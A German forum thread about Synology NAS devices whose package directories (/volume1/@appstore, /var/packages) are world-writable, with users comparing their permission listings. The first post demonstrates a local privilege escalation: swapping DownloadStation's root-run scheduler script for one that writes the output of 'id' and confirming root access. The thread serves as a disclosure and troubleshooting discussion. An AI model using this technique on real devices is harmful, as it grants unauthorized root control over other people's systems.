Security Problem???

[Ameisentaetowierer]

Hallo,

ich habe gerade einen Beitrag gelesen, wo ein User das root Passwort nicht mehr hat, aber als admin noch ssh Zugriff hat.

Ich habe meine DS213j noch nicht so lange und wollte mal schauen, wie sicher sie denn eigentlich ist.
Dabei habe ich erschreckendes festgestellt und wollte jetzt wissen, ob das bei euch auch so ist.

/volume1/@appstore hat Permission 777, wodurch jeder User Schreibzugriff hat.

ds> ls -la /volume1/@appstore/
drwxrwxrwx   12 root     root          4096 Jan 16 20:24 .
drwxr-xr-x   24 root     root          4096 Jan 16 20:17 ..
drwxrwxrwx    8 root     root          4096 Jan  9 06:42 AdvancedPowerManager
drwxrwxrwx   11 root     root          4096 Jan  9 06:43 AudioStation
drwxrwxrwx   10 root     root          4096 Dec  5 20:44 CloudStation
drwxr-xr-x    3 root     root          4096 Jan 16 20:24 DownloadStation
drwxrwxrwx   11 root     root          4096 Jan  9 06:42 DownloadStation.orig
drwxrwxrwx    9 root     root          4096 Nov 27 20:49 MediaServer
drwxrwxrwx    4 root     root          4096 Oct 24 11:33 Perl
drwxrwxrwx    9 root     root          4096 Nov 19 21:39 PhotoStation
drwxrwxrwx   10 root     root          4096 Nov 27 20:50 VideoStation

Wie man oben sehen kann habe ich das direkt ausgenutzt und das Verzeichnis der Downloadstation umbenannt und ein neues angelegt.
Warum ich das gemacht habe, sieht man in der Prozessliste:

ds> ps | grep -i download
 9208 root      3916 S    /bin/sh /var/packages/DownloadStation/scripts/start-stop-status start
 9220 root      3916 S    /bin/sh /var/packages/DownloadStation/target/scripts/S25download.sh start
 9357 root      3916 S    /bin/sh /var/packages/DownloadStation/target/sbin/scheduler

Es gibt hier nämlich Shellscripte, die als root ausgeführt werden.
/var/packages/Downloadstation/target ist ein symbolischer Link auf /volume1/@appstore/Downloadstation
Das Script scheduler habe ich dann auch gleich ausgetauscht:

#! /bin/sh

/usr/bin/id >/usr/local/sched.txt
echo "I am root" >>/usr/local/sched.txt

sleep 6000

Und dann die Downloadstation neu gestartet.
Ergebnis:

ds> cat /usr/local/sched.txt
uid=0(root) gid=0(root) groups=0(root)
I am root
ds>

Habe ich irgendwas verpasst, oder ist das bei euch auch so einfach bzw. unsicher?
Ich würde ja wenigstens /volume1/@appstore und dessen Unterverzeichnisse auf 755 setzen.

Micky

 

[goetz]

Hallo,
also bei mir hat /volume1/@appstore 755

Gruß Götz

 

[Ameisentaetowierer]

Hi,

das ist schonmal beruhigend...aber was ist mit den Unterverzeichnissen?

Und gerade sehe ich auch noch:

ds> ls -al /var/packages/
drwxrwxrwx   10 root     root          4096 Nov 19 21:44 .
drwxr-xr-x   13 root     root          4096 Jan 16 20:16 ..
drwxr-xr-x    3 root     root          4096 Jan 16 20:22 AdvancedPowerManager
drwxrwxrwx    3 root     root          4096 Jan  9 06:43 AudioStation
drwxrwxrwx    4 root     root          4096 Dec  5 20:44 CloudStation
drwxrwxrwx    3 root     root          4096 Jan 16 20:57 DownloadStation
drwxrwxrwx    3 root     root          4096 Nov 27 20:49 MediaServer
drwxrwxrwx    3 root     root          4096 Oct 24 11:33 Perl
drwxrwxrwx    3 root     root          4096 Nov 19 21:39 PhotoStation
drwxrwxrwx    4 root     root          4096 Nov 27 20:50 VideoStation

Von den einzelnen Verzeichnissen gehen ja Symlinks nach /volume1/@appstore....
Das kann doch kein Zufall sein.

Micky

 

[goetz]

Hallo,
mein /var/packages hat auch nur 755, da kann man nichts manipulieren.

Gruß Götz

 

[Puppetmaster]

Hm, also bei mir hat auch (fast) alles 777. Wie kann das sein?

DS214> ls -al
drwxrwxrwx   13 root     root          4096 Jan 16 18:19 .
drwxr-xr-x   21 root     root          4096 Jan 16 18:28 ..
drwxr-xr-x   11 root     root          4096 Jan 13 15:02 AudioStation
drwxrwxrwx    8 root     root          4096 Jan 15 15:38 DHCPServer
drwxrwxrwx   15 root     root          4096 Jan 12 21:33 MailServer
drwxrwxrwx    6 root     root          4096 Jan 15 18:44 MailStation
drwxrwxrwx    4 root     root          4096 Jan 12 14:38 Perl
drwxrwxrwx    9 root     root          4096 Jan 12 22:08 PhotoStation
drwxrwxrwx   21 admin    users         4096 Jan 12 14:39 SqueezeCenter
drwxrwxrwx   10 root     root          4096 Jan 12 14:56 VideoStation
drwxrwxrwx    4 root     root          4096 Jan 16 18:19 phpMyAdmin
drwxr-xr-x    7 tvheaden root          4096 Jan 12 14:58 tvheadend
drwxrwxrwx    3 root     root          4096 Jan 15 16:08 webconsole

 

[laserdesign]

bei mir steht auch alles auf 777, schon seltsam.

root@DS110j:~# ll /volume1/@appstore/
drwxrwxrwx   12 root     root          4096 Dec 27 17:38 .
drwxrwxrwx   22 root     root          4096 Jan  9 16:17 ..
drwxrwxrwx   11 root     root          4096 Dec 27 17:38 AudioStation
drwxrwxrwx   10 root     root          4096 Dec  6 20:19 CloudStation
drwxrwxrwx    9 root     root          4096 Nov 26 10:40 MediaServer
drwxrwxrwx    4 root     root          4096 Nov  7 13:33 Perl
drwxrwxrwx    9 root     root          4096 Nov 19 00:28 PhotoStation
drwxrwxrwx    6 root     root          4096 Dec 10 20:47 TimeBackup
drwxrwxrwx   11 root     root          4096 Nov 27 11:28 VPNCenter
drwxrwxrwx   10 root     root          4096 Nov 26 10:38 VideoStation
drwxrwxrwx    8 root     root          4096 May 26  2013 iTunesServer
drwxrwxrwx    4 root     root          4096 Oct 22 13:56 phpMyAdmin

 

[trininja]

Ein anderer Thread von mir, den ich gestartet hatte, beschäftigt sich ja auch mit dem 777 Problem, das zum Beispiel 770 nicht geht, und dann keiner drauf schreiben kann, auch keine Internen Apps zum Teil und die Flags Besitzer und Gruppe auch schön ignoriert werden zum Teil. Bin der Sache noch am nachgehen, melde mich dazu mal wieder wenn ich näheres weiß.

 

[tops4u]

Hab mir das auch gerade mal schnell angeschaut und das ist auch bei meiner Installation so!

Jedoch sind die Dateien in den Verzeichnissen jeweils 755. Ich habe nun mal mutig ein chmod 755 * in dem Verzeichnis gemacht, da ich keinen Grund sehe warum das nicht auch gehen sollte.